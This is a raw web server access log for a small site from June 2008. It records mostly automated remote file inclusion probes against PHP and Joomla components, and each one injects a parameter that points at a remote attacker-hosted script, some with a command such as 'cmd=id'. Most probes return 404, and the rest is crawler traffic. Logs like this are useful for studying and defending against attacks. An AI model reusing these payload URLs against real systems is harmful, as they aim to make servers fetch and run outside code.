190.196.13.90 - - [22/Jun/2008:20:52:00 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:20:52:02 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:20:52:12 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:20:52:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
168.243.203.247 - - [22/Jun/2008:20:53:15 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
168.243.203.247 - - [22/Jun/2008:20:53:15 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
67.52.100.181 - - [22/Jun/2008:20:56:17 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.neighborhoodglimpses.com"
67.52.100.181 - - [22/Jun/2008:20:56:18 -0700] "GET /include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.neighborhoodglimpses.com"
67.52.100.181 - - [22/Jun/2008:20:56:18 -0700] "GET /logs/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.neighborhoodglimpses.com"
74.6.17.187 - - [22/Jun/2008:20:56:28 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
74.6.17.187 - - [22/Jun/2008:20:56:29 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:20:57:41 -0700] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:20:57:44 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
74.6.22.168 - - [22/Jun/2008:20:59:17 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "neighborhoodglimpses.com"
74.6.22.168 - - [22/Jun/2008:20:59:18 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:20:59:42 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:20:59:43 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.117.129.77 - - [22/Jun/2008:20:59:53 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.117.129.77 - - [22/Jun/2008:20:59:53 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.117.129.77 - - [22/Jun/2008:20:59:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
168.243.203.247 - - [22/Jun/2008:21:07:21 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
168.243.203.247 - - [22/Jun/2008:21:07:21 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:21:13:50 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
213.35.225.138 - - [22/Jun/2008:21:14:18 -0700] "GET /logs/access_071105.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://netsaita.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.35.225.138 - - [22/Jun/2008:21:14:18 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://netsaita.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.35.225.138 - - [22/Jun/2008:21:14:19 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://netsaita.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
206.71.148.152 - - [22/Jun/2008:21:14:26 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
64.38.46.234 - - [22/Jun/2008:21:15:28 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:21:15:47 -0700] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:21:15:50 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:21:15:52 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:21:15:53 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
69.13.27.210 - - [22/Jun/2008:21:18:00 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
208.88.50.150 - - [22/Jun/2008:21:19:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
208.88.50.150 - - [22/Jun/2008:21:19:11 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
208.88.50.150 - - [22/Jun/2008:21:19:11 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
216.246.45.242 - - [22/Jun/2008:21:19:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.246.45.242 - - [22/Jun/2008:21:19:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.246.45.242 - - [22/Jun/2008:21:19:51 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
217.20.175.69 - - [22/Jun/2008:21:19:58 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
208.88.50.150 - - [22/Jun/2008:21:21:41 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
208.88.50.150 - - [22/Jun/2008:21:21:41 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
208.88.50.150 - - [22/Jun/2008:21:21:41 -0700] "GET /modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
216.246.45.242 - - [22/Jun/2008:21:22:24 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.246.45.242 - - [22/Jun/2008:21:22:24 -0700] "GET /modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.246.45.242 - - [22/Jun/2008:21:22:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://florida4auction.com/uploaded/or-else-i-delete-yours-too/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
207.44.232.90 - - [22/Jun/2008:21:25:30 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.44.232.90 - - [22/Jun/2008:21:25:31 -0700] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.44.232.90 - - [22/Jun/2008:21:25:31 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [22/Jun/2008:21:28:26 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [22/Jun/2008:21:28:27 -0700] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [22/Jun/2008:21:28:32 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.246.52.72 - - [22/Jun/2008:21:29:21 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.246.52.72 - - [22/Jun/2008:21:29:21 -0700] "GET /include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.246.52.72 - - [22/Jun/2008:21:29:22 -0700] "GET /logs/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.6.17.154 - - [22/Jun/2008:21:29:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
67.195.51.215 - - [22/Jun/2008:21:29:54 -0700] "GET /logs/access_071217.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:32 -0700] "GET /logs/access_071029.log/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:32 -0700] "GET /logs/access_071029.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:32 -0700] "GET /logs/access_071029.log/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:32 -0700] "GET /logs/access_071029.log//convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:35 -0700] "GET /logs/access_071029.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:35 -0700] "GET /logs/access_071029.log//convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:38 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:38 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:38 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:38 -0700] "GET //convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:41 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:41 -0700] "GET //convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:43 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:43 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:43 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:43 -0700] "GET /logs//convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:43 -0700] "GET /logs//convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:36:43 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.206.158.231 - - [22/Jun/2008:21:38:10 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:21:38:28 -0700] "GET /logs/access_080225.log//modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:21:38:28 -0700] "GET /logs/access_080225.log//modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:21:38:28 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:21:38:28 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:21:38:29 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:21:38:29 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.7.193.54 - - [22/Jun/2008:21:38:43 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.193.54 - - [22/Jun/2008:21:38:43 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.193.54 - - [22/Jun/2008:21:38:47 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.193.54 - - [22/Jun/2008:21:38:47 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:39:36 -0700] "GET /logs/access_071105.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:39:36 -0700] "GET /logs/access_071105.log/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:39:36 -0700] "GET /logs/access_071105.log//convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:39:36 -0700] "GET /logs/access_071105.log/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:39:36 -0700] "GET /logs/access_071105.log//convert/mvcw.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [22/Jun/2008:21:39:36 -0700] "GET /logs/access_071105.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:21:39:44 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:21:39:44 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
206.71.148.152 - - [22/Jun/2008:21:41:11 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
206.71.148.152 - - [22/Jun/2008:21:41:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
69.13.27.210 - - [22/Jun/2008:21:45:52 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
69.13.27.210 - - [22/Jun/2008:21:45:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.72.112.158 - - [22/Jun/2008:21:47:19 -0700] "GET /logs/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
64.72.112.158 - - [22/Jun/2008:21:47:19 -0700] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
88.243.86.107 - - [22/Jun/2008:21:48:51 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://baptiste-bugnon.ch/help/ix.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.neighborhoodglimpses.com"
74.6.22.155 - - [22/Jun/2008:21:49:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
74.6.22.155 - - [22/Jun/2008:21:49:00 -0700] "GET /logs/?N=A HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
